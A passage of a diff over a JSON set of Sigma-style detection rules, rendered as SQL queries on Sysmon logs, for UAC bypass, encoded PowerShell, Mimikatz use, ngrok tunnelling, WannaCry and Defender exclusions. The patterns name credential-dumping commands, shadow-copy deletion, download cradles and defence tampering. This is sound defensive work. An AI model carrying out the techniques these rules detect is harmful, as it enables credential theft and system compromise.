Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "status": "experimental", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE 
'\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE 
'%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate activity is expected since extracting files with a password can be common in some environement." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + }, + { + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. 
Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs 
WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + 
"attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious Rundll32 
execution from control.exe as used by Equation Group and Exploit Kits", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE 
'%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE 